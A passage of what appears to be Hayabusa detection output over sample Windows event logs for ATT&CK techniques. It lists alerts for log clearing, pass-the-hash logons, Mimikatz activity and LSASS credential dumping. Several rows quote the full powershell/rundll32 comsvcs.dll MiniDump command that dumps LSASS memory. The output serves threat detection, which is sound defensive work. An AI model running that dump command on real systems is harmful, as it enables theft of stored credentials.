S-1-5-21-3410678313-1251427014-1131291384-1004,rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4688-User creation via commandline.evtx +2021-10-19 14:44:30.780 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 14:44:36.789 +00:00,FS03.offsec.lan,4688,low,Disc,Windows Network 
Enumeration,,rules/sigma/process_creation_builtin/proc_creation_win_net_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 14:44:36.789 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 14:44:39.367 +00:00,FS03.offsec.lan,4688,low,Disc,Suspicious Listing of Network Connections,,rules/sigma/process_creation_builtin/proc_creation_win_susp_network_listing_connections.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1135.xxx-Network Share Discovery/ID4688-Network share discovery or connection via commandline.evtx +2021-10-19 14:45:16.394 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx +2021-10-19 14:45:18.182 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx +2021-10-19 14:45:18.198 +00:00,FS03.offsec.lan,4688,low,Disc | LatMov,Net.exe Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID4688-Network share manipulation via commandline.evtx +2021-10-20 09:18:07.101 +00:00,FS03.offsec.lan,11,medium,,File Created_Sysmon Alert,T1003 
| Path: C:\Windows\System32\mimilsa.log | Process: C:\Windows\system32\lsass.exe | PID: 512 | PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/alerts/11_FileCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx +2021-10-20 09:18:07.101 +00:00,FS03.offsec.lan,11,critical,CredAccess,Mimikatz MemSSP Default Log File Creation,,rules/sigma/file_event/file_event_win_mimimaktz_memssp_log_file.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID11-Mimikatz LSA SSP clear text password exfiltration.evtx +2021-10-20 13:39:12.731 +00:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 13:39:17.315 +00:00,FS03.offsec.lan,4624,info,,Logon Type 9 - NewCredentials,User: admmig | Computer: - | IP Addr: ::1 | LID: 0x266e045 | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 13:39:17.315 +00:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 13:39:17.315 +00:00,FS03.offsec.lan,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication 
Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 13:39:17.315 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x266e045,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 13:39:21.730 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x262bb6b,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1550-Use Alternate Authentication Material/ID4624-Mimikatz Pass the hash.evtx +2021-10-20 14:18:43.326 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:43.326 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe 
C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: OFFSEC\admmig | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x269eec8 | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: SHA1=9F1E24917EF96BBB339F4E2A226ACAFD1009F47B,MD5=C031E215B8B08C752BF362F6D4C5D3AD,SHA256=840E1F9DC5A29BEBF01626822D7390251E9CF05BB3560BA7B68BDB8A41CF08E3,IMPHASH=099B747A4A31983374E54912D4BB7C44",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,Exec,Suspicious PowerShell Parent Process,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,Exec,WMI Spawning Windows PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation_sysmon/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential 
dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_sysmon/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation_sysmon/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.808 +00:00,FS03.offsec.lan,1,high,CredAccess,PowerShell Get-Process LSASS,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.855 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:55.871 +00:00,FS03.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\3e50931f5376ebab490b124f3f46dd45\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2508 | PGUID: 7CF65FC7-254F-6170-9402-000000001200 | Hash: 
SHA1=BFDFC46117000B652897F1DE8084FBB9EAA66384,MD5=6EF679145F15A8E54FBF9B23A25A6F21,SHA256=240674945FF5175A14E5DF6DEB2AECD04231911DE9103CA34F6D327C4FF86732,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:56.089 +00:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Cmd: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\76nivOxA.dmp full | Process: C:\Windows\System32\rundll32.exe | User: OFFSEC\admmig | Parent Cmd: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\76nivOxA.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | LID: 0x269eec8 | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200 | Hash: SHA1=D4AC232D507769FFD004439C15302916A40D9831,MD5=6C308D32AFA41D26CE2A0EA8F7B79565,SHA256=5CC2C563D89257964C4B446F54AFE1E57BBEE49315A9FC001FF5A6BCB6650393,IMPHASH=156B2AC675B1B9202AF35C643105610C",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:56.089 +00:00,FS03.offsec.lan,1,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:56.105 +00:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\rundll32.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2860 | Src PGUID: 
7CF65FC7-2550-6170-9602-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:56.105 +00:00,FS03.offsec.lan,11,info,,File Created,Path: C:\Windows\Temp\76nivOxA.dmp | Process: C:\Windows\System32\rundll32.exe | PID: 2860 | PGUID: 7CF65FC7-2550-6170-9602-000000001200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:18:56.105 +00:00,FS03.offsec.lan,10,critical,CredAccess,Lsass Memory Dump via Comsvcs DLL,,rules/sigma/process_access/proc_access_win_lsass_dump_comsvcs_dll.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:19:03.334 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:19:03.334 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:19:23.345 
+00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:19:23.345 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:19:43.347 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:19:43.347 +00:00,FS03.offsec.lan,18,medium,,Pipe Connected_Sysmon Alert,"technique_id=T1049,technique_name=System Network Connections Discovery | Pipe: \srvsvc | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1640 | PGUID: 7CF65FC7-665F-6165-2000-000000001200",rules/hayabusa/sysmon/alerts/18_PipeConnected_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-LSASS dump with LSASSY (SYSMON).evtx +2021-10-20 14:29:09.758 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | 
Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.758 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfac,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.758 +00:00,FS03.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.773 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.773 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26bdfde,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.836 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be000,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.836 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 
0x26be000,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.898 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.898 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be01f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.961 +00:00,FS03.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:09.961 +00:00,FS03.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x26be03c,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.214 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump 
with LSASSY (process).evtx +2021-10-20 14:29:10.214 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -NoP -C ""C:\Windows\System32\rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump (Get-Process lsass).Id \Windows\Temp\2V7Be7Gq.dmp full;Wait-Process -Id (Get-Process rundll32).id"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x998 | User: FS03$ | LID: 0x3e4",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.214 +00:00,FS03.offsec.lan,4688,high,Exec,Suspicious Script Execution From Temp Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_script_exec_from_temp.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.214 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.214 +00:00,FS03.offsec.lan,4688,high,CredAccess,PowerShell Get-Process LSASS,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_getprocess_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.214 +00:00,FS03.offsec.lan,4688,high,CredAccess,LSASS Memory Dumping,,rules/sigma/process_creation_builtin/proc_creation_win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.214 
+00:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.526 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\rundll32.exe"" C:\Windows\System32\comsvcs.dll MiniDump 512 \Windows\Temp\2V7Be7Gq.dmp full | Path: C:\Windows\System32\rundll32.exe | PID: 0xff8 | User: admmig | LID: 0x26be03c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.526 +00:00,FS03.offsec.lan,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.526 +00:00,FS03.offsec.lan,4688,high,Evas | CredAccess,Process Dump via Comsvcs DLL,,rules/sigma/process_creation_builtin/proc_creation_win_susp_comsvcs_procdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.542 +00:00,FS03.offsec.lan,4656,critical,CredAccess,LSASS Access from Non System Account,,rules/sigma/builtin/security/win_lsass_access_non_system_account.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.542 +00:00,FS03.offsec.lan,4656,high,CredAccess,Generic Password Dumper Activity on 
LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.542 +00:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:10.542 +00:00,FS03.offsec.lan,4663,high,CredAccess,Generic Password Dumper Activity on LSASS,,rules/sigma/builtin/security/win_susp_lsass_dump_generic.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:11.230 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:11.230 +00:00,FS03.offsec.lan,5145,medium,Collect,Suspicious Access to Sensitive File Extensions,,rules/sigma/builtin/security/win_susp_raccess_sensitive_fext.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-LSASS dump with LSASSY (process).evtx +2021-10-20 14:29:12.553 +00:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\2V7Be7Gq.dmp | IP Addr: 10.23.123.11 | LID: 0x26bdfac,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential 
